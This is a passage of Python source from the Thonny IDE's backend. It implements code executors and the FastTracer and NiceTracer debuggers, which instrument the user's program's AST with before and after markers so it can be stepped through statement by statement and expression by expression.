# Useful in shell to get last expression value in multi-statement block
root = self._prepare_ast(source, filename, "exec")
statements = compile(ast.Module(body=root.body[:-1]), filename, "exec")
expression = compile(ast.Expression(root.body[-1].value), filename, "eval")
else:
root = self._prepare_ast(source, filename, mode)
if mode == "eval":
assert not ast_postprocessors
expression = compile(root, filename, mode)
elif mode == "exec":
for func in ast_postprocessors:
func(root)
statements = compile(root, filename, mode)
else:
raise ValueError("Unknown mode")
return self._execute_prepared_user_code(statements, expression, global_vars)
except SyntaxError:
return {"user_exception": self._vm._prepare_user_exception()}
except SystemExit:
return {"SystemExit": True}
except Exception:
_report_internal_error()
return {}
@return_execution_result
@prepare_hooks
def _execute_prepared_user_code(self, statements, expression, global_vars):
if statements:
exec(statements, global_vars)
if expression:
value = eval(expression, global_vars)
if value is not None:
builtins._ = value
return {"value_info": self._vm.export_value(value)}
def find_spec(self, fullname, path=None, target=None):
"""override in subclass for custom-loading user modules"""
return None
def _prepare_ast(self, source, filename, mode):
return ast.parse(source, filename, mode)
class SimpleRunner(Executor):
pass
class Tracer(Executor):
def __init__(self, vm, original_cmd):
super().__init__(vm, original_cmd)
self._thonny_src_dir = os.path.dirname(sys.modules["thonny"].__file__)
self._fresh_exception = None
self._reported_frame_ids = set()
# first (automatic) stepping command depends on whether any breakpoints were set or not
breakpoints = self._original_cmd.breakpoints
assert isinstance(breakpoints, dict)
if breakpoints:
command_name = "resume"
else:
command_name = "step_into"
self._current_command = DebuggerCommand(
command_name,
state=None,
focus=None,
frame_id=None,
exception=None,
breakpoints=breakpoints,
)
def _trace(self, frame, event, arg):
raise NotImplementedError()
def _frame_is_alive(self, frame_id):
raise NotImplementedError()
def _execute_prepared_user_code(self, statements, expression, global_vars):
try:
sys.settrace(self._trace)
if hasattr(sys, "breakpointhook"):
old_breakpointhook = sys.breakpointhook
sys.breakpointhook = self._breakpointhook
return super()._execute_prepared_user_code(statements, expression, global_vars)
finally:
sys.settrace(None)
if hasattr(sys, "breakpointhook"):
sys.breakpointhook = old_breakpointhook
def _should_skip_frame(self, frame, event):
if event == "return":
# need to close frame in UI even if user issued Resume
return False
return (
not self._is_interesting_frame(frame)
or self._current_command.name == "resume"
and frame.f_code.co_filename not in self._current_command.breakpoints
)
def _is_interesting_frame(self, frame):
# For some reason Pylint doesn't see inspect.CO_GENERATOR and such
# pylint: disable=no-member
code = frame.f_code
return not (
code is None
or code.co_filename is None
or not self._is_interesting_module_file(code.co_filename)
or code.co_flags & inspect.CO_GENERATOR # @UndefinedVariable
or sys.version_info >= (3, 5)
and code.co_flags & inspect.CO_COROUTINE # @UndefinedVariable
or sys.version_info >= (3, 5)
and code.co_flags & inspect.CO_ITERABLE_COROUTINE # @UndefinedVariable
or sys.version_info >= (3, 6)
and code.co_flags & inspect.CO_ASYNC_GENERATOR # @UndefinedVariable
or "importlib._bootstrap" in code.co_filename
or self._vm.is_doing_io()
or path_startswith(code.co_filename, self._thonny_src_dir)
)
def _is_interesting_module_file(self, path):
# interesting files are the files in the same directory as main module
# or the ones with breakpoints
# When command is "resume", then only modules with breakpoints are interesting
# (used to be more flexible, but this caused problems
# when main script was in ~/. Then user site library became interesting as well)
return (
self._main_module_path is not None
and (
self._current_command.get("allow_stepping_into_libraries", False)
or is_same_path(os.path.dirname(path), os.path.dirname(self._main_module_path))
)
or path in self._current_command["breakpoints"]
)
def _is_interesting_exception(self, frame):
# interested only in exceptions in command frame or its parent frames
return id(frame) == self._current_command["frame_id"] or not self._frame_is_alive(
self._current_command["frame_id"]
)
def _fetch_next_debugger_command(self):
while True:
cmd = self._vm._fetch_command()
if isinstance(cmd, InlineCommand):
self._vm.handle_command(cmd)
else:
assert isinstance(cmd, DebuggerCommand)
return cmd
def _register_affected_frame(self, exception_obj, frame):
if not hasattr(exception_obj, "_affected_frame_ids_"):
exception_obj._affected_frame_ids_ = set()
exception_obj._affected_frame_ids_.add(id(frame))
def _get_current_exception(self):
if self._fresh_exception is not None:
return self._fresh_exception
else:
return sys.exc_info()
def _export_exception_info(self):
exc = self._get_current_exception()
if exc[0] is None:
return {
"id": None,
"msg": None,
"type_name": None,
"lines_with_frame_info": None,
"affected_frame_ids": set(),
"is_fresh": False,
}
else:
return {
"id": id(exc[1]),
"msg": str(exc[1]),
"type_name": exc[0].__name__,
"lines_with_frame_info": format_exception_with_frame_info(*exc),
"affected_frame_ids": exc[1]._affected_frame_ids_,
"is_fresh": exc == self._fresh_exception,
}
def _get_breakpoints_with_cursor_position(self, cmd):
if cmd["cursor_position"] is None:
return cmd["breakpoints"]
else:
result = copy.copy(cmd["breakpoints"])
path, line = cmd["cursor_position"]
if path not in result:
result[path] = set()
result[path].add(line)
return result
def _breakpointhook(self, *args, **kw):
pass
def _check_notify_return(self, frame_id):
if frame_id in self._reported_frame_ids:
# Need extra notification, because it may be long time until next interesting event
self._vm.send_message(InlineResponse("debugger_return", frame_id=frame_id))
def _check_store_main_frame_id(self, frame):
if (
self._current_command.frame_id is None
and frame.f_code.co_filename == self._main_module_path
):
self._current_command.frame_id = id(frame)
class FastTracer(Tracer):
def __init__(self, vm, original_cmd):
super().__init__(vm, original_cmd)
self._alive_frame_ids = set()
def _breakpointhook(self, *args, **kw):
frame = inspect.currentframe()
while not self._is_interesting_frame(frame):
frame = frame.f_back
self._report_current_state(frame)
self._current_command = self._fetch_next_debugger_command()
def _trace(self, frame, event, arg):
if self._should_skip_frame(frame, event):
return None
if event == "call":
self._check_store_main_frame_id(frame)
self._fresh_exception = None
# can we skip this frame?
if self._current_command.name == "step_over" and not self._current_command.breakpoints:
return None
else:
self._alive_frame_ids.add(id(frame))
elif event == "return":
self._fresh_exception = None
self._alive_frame_ids.remove(id(frame))
self._check_notify_return(id(frame))
elif event == "exception":
self._fresh_exception = arg
self._register_affected_frame(arg[1], frame)
if self._is_interesting_exception(frame):
# UI doesn't know about separate exception events
self._report_current_state(frame)
self._current_command = self._fetch_next_debugger_command()
elif event == "line":
self._fresh_exception = None
handler = getattr(self, "_cmd_%s_completed" % self._current_command.name)
if handler(frame, self._current_command):
self._report_current_state(frame)
self._current_command = self._fetch_next_debugger_command()
else:
self._fresh_exception = None
return self._trace
def _report_current_state(self, frame):
stack = self._vm._export_stack(frame, self._is_interesting_frame)
msg = DebuggerResponse(
stack=stack,
in_present=True,
io_symbol_count=None,
exception_info=self._export_exception_info(),
tracer_class="FastTracer",
)
self._reported_frame_ids.update(map(lambda f: f.id, stack))
self._vm.send_message(msg)
def _cmd_step_into_completed(self, frame, cmd):
return True
def _cmd_step_over_completed(self, frame, cmd):
frame_id = id(frame)
return (
frame_id == cmd.frame_id
or cmd.frame_id not in self._alive_frame_ids
or self._at_a_breakpoint(frame, cmd)
)
def _cmd_step_out_completed(self, frame, cmd):
return cmd.frame_id not in self._alive_frame_ids or self._at_a_breakpoint(frame, cmd)
def _cmd_resume_completed(self, frame, cmd):
return self._at_a_breakpoint(frame, cmd)
def _cmd_run_to_cursor_completed(self, frame, cmd):
return self._at_a_breakpoint(frame, cmd, self._get_breakpoints_with_cursor_position(cmd))
def _at_a_breakpoint(self, frame, cmd, breakpoints=None):
# TODO: try re-entering same line in loop
if breakpoints is None:
breakpoints = cmd.breakpoints
filename = frame.f_code.co_filename
return filename in breakpoints and frame.f_lineno in breakpoints[filename]
def _frame_is_alive(self, frame_id):
return frame_id in self._alive_frame_ids
class NiceTracer(Tracer):
def __init__(self, vm, original_cmd):
super().__init__(vm, original_cmd)
self._instrumented_files = set()
self._install_marker_functions()
self._custom_stack = []
self._saved_states = []
self._current_state_index = 0
from collections import Counter
self._fulltags = Counter()
self._nodes = {}
def _breakpointhook(self, *args, **kw):
self._report_state(len(self._saved_states) - 1)
self._current_command = self._fetch_next_debugger_command()
def _install_marker_functions(self):
# Make dummy marker functions universally available by putting them
# into builtin scope
self.marker_function_names = {
BEFORE_STATEMENT_MARKER,
AFTER_STATEMENT_MARKER,
BEFORE_EXPRESSION_MARKER,
AFTER_EXPRESSION_MARKER,
}
for name in self.marker_function_names:
if not hasattr(builtins, name):
setattr(builtins, name, getattr(self, name))
def _prepare_ast(self, source, filename, mode):
# ast_utils need to be imported after asttokens
# is (custom-)imported
from thonny import ast_utils
root = ast.parse(source, filename, mode)
ast_utils.mark_text_ranges(root, source)
self._tag_nodes(root)
self._insert_expression_markers(root)
self._insert_statement_markers(root)
self._insert_for_target_markers(root)
self._instrumented_files.add(filename)
return root
def _should_skip_frame(self, frame, event):
code = frame.f_code
return (
# never skip marker functions, because they are triggers
# for adding new custom stack frames
code.co_name not in self.marker_function_names
and (
super()._should_skip_frame(frame, event)
or code.co_filename not in self._instrumented_files
)
)
def find_spec(self, fullname, path=None, target=None):
spec = PathFinder.find_spec(fullname, path, target)
if (
spec is not None
and isinstance(spec.loader, SourceFileLoader)
and getattr(spec, "origin", None)
and self._is_interesting_module_file(spec.origin)
):
spec.loader = FancySourceFileLoader(fullname, spec.origin, self)
return spec
else:
return super().find_spec(fullname, path, target)
def is_in_past(self):
return self._current_state_index < len(self._saved_states) - 1
def _trace(self, frame, event, arg):
try:
return self._trace_and_catch(frame, event, arg)
except BaseException:
traceback.print_exc()
sys.settrace(None)
return None
def _trace_and_catch(self, frame, event, arg):
"""
1) Detects marker calls and responds to client queries in these spots
2) Maintains a customized view of stack
"""
# frame skipping test should be done both in new frames and old ones (because of Resume)
# Note that intermediate frames can't be skipped when jumping to a breakpoint
# because of the need to maintain custom stack
if self._should_skip_frame(frame, event):
return None
code_name = frame.f_code.co_name
if event == "call":
self._fresh_exception = (
None
) # some code is running, therefore exception is not fresh anymore
if code_name in self.marker_function_names:
self._check_store_main_frame_id(frame.f_back)
# the main thing
if code_name == BEFORE_STATEMENT_MARKER:
event = "before_statement"
elif code_name == AFTER_STATEMENT_MARKER:
event = "after_statement"
elif code_name == BEFORE_EXPRESSION_MARKER:
event = "before_expression"
elif code_name == AFTER_EXPRESSION_MARKER:
event = "after_expression"
else:
raise AssertionError("Unknown marker function")
marker_function_args = frame.f_locals.copy()
node = self._nodes[marker_function_args["node_id"]]
del marker_function_args["self"]
if "call_function" not in node.tags:
self._handle_progress_event(frame.f_back, event, marker_function_args, node)
self._try_interpret_as_again_event(frame.f_back, event, marker_function_args, node)
else:
# Calls to proper functions.
# Client doesn't care about these events,
# it cares about "before_statement" events in the first statement of the body
self._custom_stack.append(CustomStackFrame(frame, "call"))
elif event == "exception":
self._fresh_exception = arg
self._register_affected_frame(arg[1], frame)
# use the state prepared by previous event
last_custom_frame = self._custom_stack[-1]
assert last_custom_frame.system_frame == frame
assert last_custom_frame.event.startswith("before_")
pseudo_event = last_custom_frame.event.replace("before_", "after_").replace(
"_again", ""
)
self._handle_progress_event(frame, pseudo_event, {}, last_custom_frame.node)
elif event == "return":
self._fresh_exception = None
if code_name not in self.marker_function_names:
frame_id = id(self._custom_stack[-1].system_frame)
self._check_notify_return(frame_id)
self._custom_stack.pop()
if len(self._custom_stack) == 0:
# We popped last frame, this means our program has ended.
# There may be more events coming from upper (system) frames
# but we're not interested in those
sys.settrace(None)
else:
pass
else:
self._fresh_exception = None
return self._trace
def _handle_progress_event(self, frame, event, args, node):
self._save_current_state(frame, event, args, node)
self._respond_to_commands()
def _save_current_state(self, frame, event, args, node):
"""
Updates custom stack and stores the state
self._custom_stack always keeps last info,
which gets exported as FrameInfos to _saved_states["stack"]
"""
focus = TextRange(node.lineno, node.col_offset, node.end_lineno, node.end_col_offset)
custom_frame = self._custom_stack[-1]
custom_frame.event = event
custom_frame.focus = focus
custom_frame.node = node
custom_frame.node_tags = node.tags
if self._saved_states:
prev_state = self._saved_states[-1]
prev_state_frame = self._create_actual_active_frame(prev_state)
else:
prev_state = None
prev_state_frame = None
# store information about current statement / expression
if "statement" in event:
custom_frame.current_statement = focus
if event == "before_statement_again":
# keep the expression information from last event
pass
else:
custom_frame.current_root_expression = None
custom_frame.current_evaluations = []
else:
assert "expression" in event
assert prev_state_frame is not None
# see whether current_root_expression needs to be updated
prev_root_expression = prev_state_frame.current_root_expression
if event == "before_expression" and (
id(frame) != id(prev_state_frame.system_frame)
or "statement" in prev_state_frame.event
or not range_contains_smaller_or_equal(prev_root_expression, focus)
):
custom_frame.current_root_expression = focus
custom_frame.current_evaluations = []
if event == "after_expression" and "value" in args:
# value is missing in case of exception
custom_frame.current_evaluations.append(
(focus, self._vm.export_value(args["value"]))
)
# Save the snapshot.
# Check if we can share something with previous state
if (
prev_state is not None
and id(prev_state_frame.system_frame) == id(frame)
and prev_state["exception_value"] is self._get_current_exception()[1]
and prev_state["fresh_exception_id"] == id(self._fresh_exception)
and ("before" in event or "skipexport" in node.tags)
):
exception_info = prev_state["exception_info"]
# share the stack ...
stack = prev_state["stack"]
# ... but override certain things
active_frame_overrides = {
"event": custom_frame.event,
"focus": custom_frame.focus,
"node_tags": custom_frame.node_tags,
"current_root_expression": custom_frame.current_root_expression,
"current_evaluations": custom_frame.current_evaluations.copy(),
"current_statement": custom_frame.current_statement,
}
else:
# make full export
stack = self._export_stack()
exception_info = self._export_exception_info()
active_frame_overrides = {}
msg = {
"stack": stack,
"active_frame_overrides": active_frame_overrides,
"in_client_log": False,
"io_symbol_count": (
sys.stdin._processed_symbol_count
+ sys.stdout._processed_symbol_count
+ sys.stderr._processed_symbol_count
),
"exception_value": self._get_current_exception()[1],
"fresh_exception_id": id(self._fresh_exception),
"exception_info": exception_info,
}
self._saved_states.append(msg)
def _respond_to_commands(self):
"""Tries to respond to client commands with states collected so far.
Returns if these states don't suffice anymore and Python needs
to advance the program"""
# while the state for current index is already saved:
while self._current_state_index < len(self._saved_states):
state = self._saved_states[self._current_state_index]
# Get current state's most recent frame (together with overrides
frame = self._create_actual_active_frame(state)
# Is this state meant to be seen?
if "skip_" + frame.event not in frame.node_tags:
# if True:
# Has the command completed?
tester = getattr(self, "_cmd_" + self._current_command.name + "_completed")
cmd_complete = tester(frame, self._current_command)
if cmd_complete:
state["in_client_log"] = True
self._report_state(self._current_state_index)
self._current_command = self._fetch_next_debugger_command()
if self._current_command.name == "step_back":
if self._current_state_index == 0:
# Already in first state. Remain in this loop
pass
else:
assert self._current_state_index > 0
# Current event is no longer present in GUI "undo log"
self._saved_states[self._current_state_index]["in_client_log"] = False
self._current_state_index -= 1
else:
# Other commands move the pointer forward
self._current_state_index += 1
def _create_actual_active_frame(self, state):
return state["stack"][-1]._replace(**state["active_frame_overrides"])
def _report_state(self, state_index):
in_present = state_index == len(self._saved_states) - 1
if in_present:
# For reported new events re-export stack to make sure it is not shared.
# (There is tiny chance that sharing previous state
# after executing BinOp, Attribute, Compare or Subscript
# was not the right choice. See tag_nodes for more.)
# Re-exporting reduces the harm by showing correct data at least
# for present states.
self._saved_states[state_index]["stack"] = self._export_stack()
# need to make a copy for applying overrides
# and removing helper fields without modifying original
state = self._saved_states[state_index].copy()
state["stack"] = state["stack"].copy()
state["in_present"] = in_present
if not in_present:
# for past states fix the newest frame
state["stack"][-1] = self._create_actual_active_frame(state)
del state["exception_value"]
del state["active_frame_overrides"]
# Convert stack of TempFrameInfos to stack of FrameInfos
new_stack = []
for tframe in state["stack"]:
system_frame = tframe.system_frame
module_name = system_frame.f_globals["__name__"]
code_name = system_frame.f_code.co_name
source, firstlineno, in_library = self._vm._get_frame_source_info(system_frame)
assert firstlineno is not None, "nofir " + str(system_frame)
frame_id = id(system_frame)
new_stack.append(
FrameInfo(
id=frame_id,
filename=system_frame.f_code.co_filename,
module_name=module_name,
code_name=code_name,
locals=tframe.locals,
globals=tframe.globals,
freevars=system_frame.f_code.co_freevars,
source=source,
lineno=system_frame.f_lineno,
firstlineno=firstlineno,
in_library=in_library,
event=tframe.event,
focus=tframe.focus,
node_tags=tframe.node_tags,
current_statement=tframe.current_statement,
current_evaluations=tframe.current_evaluations,
current_root_expression=tframe.current_root_expression,
)
)
self._reported_frame_ids.add(frame_id)
state["stack"] = new_stack
state["tracer_class"] = "NiceTracer"
self._vm.send_message(DebuggerResponse(**state))
def _try_interpret_as_again_event(self, frame, original_event, original_args, original_node):
"""
Some after_* events can be interpreted also as
"before_*_again" events (eg. when last argument of a call was
evaluated, then we are just before executing the final stage of the call)
"""
if original_event == "after_expression":
value = original_args.get("value")
if (
"last_child" in original_node.tags
or "or_arg" in original_node.tags
and value
or "and_arg" in original_node.tags
and not value
):
# there may be explicit exceptions
if (
"skip_after_statement_again" in original_node.parent_node.tags
or "skip_after_expression_again" in original_node.parent_node.tags
):
return
# next step will be finalizing evaluation of parent of current expr
# so let's say we're before that parent expression
again_args = {"node_id": id(original_node.parent_node)}
again_event = (
"before_expression_again"
if "child_of_expression" in original_node.tags
else "before_statement_again"
)
self._handle_progress_event(
frame, again_event, again_args, original_node.parent_node
)
def _cmd_step_over_completed(self, frame, cmd):
"""
Identifies the moment when piece of code indicated by cmd.frame_id and cmd.focus
has completed execution (either successfully or not).
"""
if self._at_a_breakpoint(frame, cmd):
return True
# Make sure the correct frame_id is selected
if id(frame.system_frame) == cmd.frame_id:
# We're in the same frame
if "before_" in cmd.state:
if not range_contains_smaller_or_equal(cmd.focus, frame.focus):
# Focus has changed, command has completed
return True
else:
# Keep running
return False
elif "after_" in cmd.state:
if (
frame.focus != cmd.focus
or "before_" in frame.event
or "_expression" in cmd.state
and "_statement" in frame.event
or "_statement" in cmd.state
and "_expression" in frame.event
):
# The state has changed, command has completed
return True
else:
# Keep running
return False
else:
# We're in another frame
if self._frame_is_alive(cmd.frame_id):
# We're in a successor frame, keep running
return False
else:
# Original frame has completed, assumedly because of an exception
# We're done
return True
return True # not actually required, just to make Pylint happy
def _cmd_step_into_completed(self, frame, cmd):
return frame.event != "after_statement"
def _cmd_step_back_completed(self, frame, cmd):
# Check if the selected message has been previously sent to front-end
return (
self._saved_states[self._current_state_index]["in_client_log"]
or self._current_state_index == 0
)
def _cmd_step_out_completed(self, frame, cmd):
if self._current_state_index == 0:
return False
if frame.event == "after_statement":
return False
if self._at_a_breakpoint(frame, cmd):
return True
prev_state_frame = self._saved_states[self._current_state_index - 1]["stack"][-1]
return (
# the frame has completed
not self._frame_is_alive(cmd.frame_id)
# we're in the same frame but on higher level
# TODO: expression inside statement expression has same range as its parent
or id(frame.system_frame) == cmd.frame_id
and range_contains_smaller(frame.focus, cmd.focus)
# or we were there in prev state
or id(prev_state_frame.system_frame) == cmd.frame_id
and range_contains_smaller(prev_state_frame.focus, cmd.focus)
)
def _cmd_resume_completed(self, frame, cmd):
return self._at_a_breakpoint(frame, cmd)
def _cmd_run_to_cursor_completed(self, frame, cmd):
return self._at_a_breakpoint(frame, cmd, self._get_breakpoints_with_cursor_position(cmd))
def _at_a_breakpoint(self, frame, cmd, breakpoints=None):
if breakpoints is None:
breakpoints = cmd["breakpoints"]
return (
frame.event in ["before_statement", "before_expression"]
and frame.system_frame.f_code.co_filename in breakpoints
and frame.focus.lineno in breakpoints[frame.system_frame.f_code.co_filename]
# consider only first event on a line
# (but take into account that same line may be reentered)
and (
cmd.focus is None
or (cmd.focus.lineno != frame.focus.lineno)
or (cmd.focus == frame.focus and cmd.state == frame.event)
or id(frame.system_frame) != cmd.frame_id
)
)
def _frame_is_alive(self, frame_id):
for frame in self._custom_stack:
if id(frame.system_frame) == frame_id:
return True
return False
def _export_stack(self):
result = []
exported_globals_per_module = {}
def export_globals(module_name, frame):
if module_name not in exported_globals_per_module:
exported_globals_per_module[module_name] = self._vm.export_variables(
frame.f_globals
)
return exported_globals_per_module[module_name]
for custom_frame in self._custom_stack:
system_frame = custom_frame.system_frame
module_name = system_frame.f_globals["__name__"]
result.append(
TempFrameInfo(
# need to store the reference to the frame to avoid it being GC-d
# otherwise frame id-s would be reused and this would
# mess up communication with the frontend.
system_frame=system_frame,
locals=None
if system_frame.f_locals is system_frame.f_globals
else self._vm.export_variables(system_frame.f_locals),
globals=export_globals(module_name, system_frame),
event=custom_frame.event,
focus=custom_frame.focus,
node_tags=custom_frame.node_tags,
current_evaluations=custom_frame.current_evaluations.copy(),
current_statement=custom_frame.current_statement,
current_root_expression=custom_frame.current_root_expression,
)
)
assert result # not empty
return result
def _thonny_hidden_before_stmt(self, node_id):
# The code to be debugged will be instrumented with this function
# inserted before each statement.
# Entry into this function indicates that statement as given
# by the code range is about to be evaluated next.
return None
def _thonny_hidden_after_stmt(self, node_id):
# The code to be debugged will be instrumented with this function
# inserted after each statement.
# Entry into this function indicates that statement as given
# by the code range was just executed successfully.
return None
def _thonny_hidden_before_expr(self, node_id):
# Entry into this function indicates that expression as given
# by the code range is about to be evaluated next
return node_id
def _thonny_hidden_after_expr(self, node_id, value):
# The code to be debugged will be instrumented with this function
# wrapped around each expression (given as 2nd argument).
# Entry into this function indicates that expression as given
# by the code range was just evaluated to given value
return value
def _tag_nodes(self, root):
"""Marks interesting properties of AST nodes"""
# ast_utils need to be imported after asttokens
# is (custom-)imported
from thonny import ast_utils
def add_tag(node, tag):
if not hasattr(node, "tags"):
node.tags = set()
node.tags.add("class=" + node.__class__.__name__)
node.tags.add(tag)
# ignore module docstring if it is before from __future__ import
if (
isinstance(root.body[0], ast.Expr)
and isinstance(root.body[0].value, ast.Str)
and len(root.body) > 1
and isinstance(root.body[1], ast.ImportFrom)
and root.body[1].module == "__future__"
):
add_tag(root.body[0], "ignore")
add_tag(root.body[0].value, "ignore")
add_tag(root.body[1], "ignore")
for node in ast.walk(root):
if not isinstance(node, (ast.expr, ast.stmt)):
if isinstance(node, ast.comprehension):
for expr in node.ifs:
add_tag(expr, "comprehension.if")
continue
# tag last children
last_child = ast_utils.get_last_child(node)
assert last_child in [True, False, None] or isinstance(
last_child, (ast.expr, ast.stmt, type(None))
), ("Bad last child " + str(last_child) + " of " + str(node))
if last_child is not None:
add_tag(node, "has_children")
if isinstance(last_child, ast.AST):
last_child.parent_node = node
add_tag(last_child, "last_child")
if isinstance(node, _ast.expr):
add_tag(last_child, "child_of_expression")
else:
add_tag(last_child, "child_of_statement")
if isinstance(node, ast.Call):
add_tag(last_child, "last_call_arg")
# other cases
if isinstance(node, ast.Call):
add_tag(node.func, "call_function")
node.func.parent_node = node
if isinstance(node, ast.BoolOp) and node.op == ast.Or():
for child in node.values:
add_tag(child, "or_arg")
child.parent_node = node
if isinstance(node, ast.BoolOp) and node.op == ast.And():
for child in node.values:
add_tag(child, "and_arg")
child.parent_node = node
# TODO: assert (it doesn't evaluate msg when test == True)
if isinstance(node, ast.Str):
add_tag(node, "skipexport")
if hasattr(ast, "JoinedStr") and isinstance(node, ast.JoinedStr):
# can't present children normally without
# ast giving correct locations for them
add_tag(node, "ignore_children")
elif isinstance(node, ast.Num):
add_tag(node, "skipexport")
elif isinstance(node, ast.List):
add_tag(node, "skipexport")
elif isinstance(node, ast.Tuple):
add_tag(node, "skipexport")
elif isinstance(node, ast.Set):
add_tag(node, "skipexport")
elif isinstance(node, ast.Dict):
add_tag(node, "skipexport")
elif isinstance(node, ast.Name):
add_tag(node, "skipexport")
elif isinstance(node, ast.NameConstant):
add_tag(node, "skipexport")
elif hasattr(ast, "Constant") and isinstance(node, ast.Constant):
add_tag(node, "skipexport")
elif isinstance(node, ast.Expr):
if not isinstance(node.value, (ast.Yield, ast.YieldFrom)):
add_tag(node, "skipexport")
elif isinstance(node, ast.If):
add_tag(node, "skipexport")
elif isinstance(node, ast.Return):
add_tag(node, "skipexport")
elif isinstance(node, ast.While):
add_tag(node, "skipexport")
elif isinstance(node, ast.Continue):
add_tag(node, "skipexport")
elif isinstance(node, ast.Break):
add_tag(node, "skipexport")
elif isinstance(node, ast.Pass):
add_tag(node, "skipexport")
elif isinstance(node, ast.For):
add_tag(node, "skipexport")
elif isinstance(node, ast.Try):
add_tag(node, "skipexport")
elif isinstance(node, ast.ListComp):
add_tag(node.elt, "ListComp.elt")
if len(node.generators) > 1:
add_tag(node, "ignore_children")
elif isinstance(node, ast.SetComp):
add_tag(node.elt, "SetComp.elt")
if len(node.generators) > 1:
add_tag(node, "ignore_children")
elif isinstance(node, ast.DictComp):
add_tag(node.key, "DictComp.key")
add_tag(node.value, "DictComp.value")
if len(node.generators) > 1:
add_tag(node, "ignore_children")
elif isinstance(node, ast.BinOp):
# TODO: use static analysis to detect type of left child
add_tag(node, "skipexport")
elif isinstance(node, ast.Attribute):
# TODO: use static analysis to detect type of left child
add_tag(node, "skipexport")
elif isinstance(node, ast.Subscript):
# TODO: use static analysis to detect type of left child
add_tag(node, "skipexport")
elif isinstance(node, ast.Compare):
# TODO: use static analysis to detect type of left child
add_tag(node, "skipexport")
if isinstance(node, (ast.Assign)):
# value will be presented in assignment's before_statement_again
add_tag(node.value, "skip_after_expression")
if isinstance(node, (ast.Expr, ast.While, ast.For, ast.If, ast.Try, ast.With)):
add_tag(node, "skip_after_statement_again")
# make sure every node has this field
if not hasattr(node, "tags"):
node.tags = set()
def _should_instrument_as_expression(self, node):
return (
isinstance(node, _ast.expr)
and not getattr(node, "incorrect_range", False)
and "ignore" not in node.tags
and (not hasattr(node, "ctx") or isinstance(node.ctx, ast.Load))
# TODO: repeatedly evaluated subexpressions of comprehensions
# can be supported (but it requires some redesign both in backend and GUI)
and "ListComp.elt" not in node.tags
and "SetComp.elt" not in node.tags
and "DictComp.key" not in node.tags
and "DictComp.value" not in node.tags
and "comprehension.if" not in node.tags
)
def _should_instrument_as_statement(self, node):
return (
isinstance(node, _ast.stmt)
and not getattr(node, "incorrect_range", False)
and "ignore" not in node.tags
# Shouldn't insert anything before from __future__ import
# as this is not a normal statement
# https://bitbucket.org/plas/thonny/issues/183/thonny-throws-false-positive-syntaxerror
and (not isinstance(node, ast.ImportFrom) or node.module != "__future__")
)
def _insert_statement_markers(self, root):
# find lists of statements and insert before/after markers for each statement
for name, value in ast.iter_fields(root):
if isinstance(root, ast.Try) and name == "handlers":
# contains statements but is not statement itself
for handler in value:
self._insert_statement_markers(handler)
elif isinstance(value, ast.AST):
self._insert_statement_markers(value)
elif isinstance(value, list):
if len(value) > 0:
new_list = []
for node in value:
if self._should_instrument_as_statement(node):
# self._debug("EBFOMA", node)
# add before marker
new_list.append(
self._create_statement_marker(node, BEFORE_STATEMENT_MARKER)
)
# original statement
if self._should_instrument_as_statement(node):
self._insert_statement_markers(node)
new_list.append(node)
if (
self._should_instrument_as_statement(node)
and "skipexport" not in node.tags
):
# add after marker
new_list.append(
self._create_statement_marker(node, AFTER_STATEMENT_MARKER)
)
setattr(root, name, new_list)
def _create_statement_marker(self, node, function_name):
call = self._create_simple_marker_call(node, function_name)
stmt = ast.Expr(value=call)
ast.copy_location(stmt, node)
ast.fix_missing_locations(stmt)
return stmt
def _insert_for_target_markers(self, root):
"""inserts markers which notify assignment to for-loop variables"""
for node in ast.walk(root):
if isinstance(node, ast.For):
old_target = node.target
# print(vars(old_target))
temp_name = "__for_loop_var"
node.target = ast.Name(temp_name, ast.Store())
name_load = ast.Name(temp_name, ast.Load())
# value will be visible in parent's before_statement_again event
name_load.tags = {"skip_before_expression", "skip_after_expression", "last_child"}
name_load.lineno, name_load.col_offset = (node.iter.lineno, node.iter.col_offset)
name_load.end_lineno, name_load.end_col_offset = (
node.iter.end_lineno,
node.iter.end_col_offset,
)
before_name_load = self._create_simple_marker_call(
name_load, BEFORE_EXPRESSION_MARKER
)
after_name_load = ast.Call(
func=ast.Name(id=AFTER_EXPRESSION_MARKER, ctx=ast.Load()),
args=[before_name_load, name_load],
keywords=[],
)
ass = ast.Assign([old_target], after_name_load)
ass.lineno, ass.col_offset = old_target.lineno, old_target.col_offset
ass.end_lineno, ass.end_col_offset = (
node.iter.end_lineno,
node.iter.end_col_offset,
)
ass.tags = {"skip_before_statement"} # before_statement_again will be shown
name_load.parent_node = ass
ass_before = self._create_statement_marker(ass, BEFORE_STATEMENT_MARKER)
node.body.insert(0, ass_before)
node.body.insert(1, ass)
node.body.insert(2, self._create_statement_marker(ass, AFTER_STATEMENT_MARKER))
ast.fix_missing_locations(node)
def _insert_expression_markers(self, node):
"""
TODO: this docstring is outdated
each expression e gets wrapped like this:
_after(_before(_loc, _node_is_zoomable), e, _node_role, _parent_range)
where
_after is function that gives the resulting value
_before is function that signals the beginning of evaluation of e
_loc gives the code range of e
_node_is_zoomable indicates whether this node has subexpressions
_node_role is either 'last_call_arg', 'last_op_arg', 'first_or_arg',
'first_and_arg', 'function' or None
"""
tracer = self
class ExpressionVisitor(ast.NodeTransformer):
def generic_visit(self, node):
if isinstance(node, _ast.expr):
if isinstance(node, ast.Starred):
# keep this node as is, but instrument its children
return ast.NodeTransformer.generic_visit(self, node)
elif tracer._should_instrument_as_expression(node):
# before marker
before_marker = tracer._create_simple_marker_call(
node, BEFORE_EXPRESSION_MARKER
)
ast.copy_location(before_marker, node)
if "ignore_children" in node.tags:
transformed_node = node
else:
transformed_node = ast.NodeTransformer.generic_visit(self, node)
# after marker
after_marker = ast.Call(
func=ast.Name(id=AFTER_EXPRESSION_MARKER, ctx=ast.Load()),
args=[before_marker, transformed_node],
keywords=[],
)
ast.copy_location(after_marker, node)
ast.fix_missing_locations(after_marker)
# further transformations may query original node location from after marker
if hasattr(node, "end_lineno"):
after_marker.end_lineno = node.end_lineno
after_marker.end_col_offset = node.end_col_offset
return after_marker
else:
# This expression (and its children) should be ignored
return node
else:
# Descend into statements
return ast.NodeTransformer.generic_visit(self, node)
return ExpressionVisitor().visit(node)
def _create_simple_marker_call(self, node, fun_name, extra_args=[]):
args = [self._export_node(node)] + extra_args
return ast.Call(func=ast.Name(id=fun_name, ctx=ast.Load()), args=args, keywords=[])
def _export_node(self, node):
assert isinstance(node, (ast.expr, ast.stmt))
node_id = id(node)
self._nodes[node_id] = node
return ast.Num(node_id)
def _debug(self, *args):
logger.debug("TRACER: " + str(args))
def _execute_prepared_user_code(self, statements, expression, global_vars):
try:
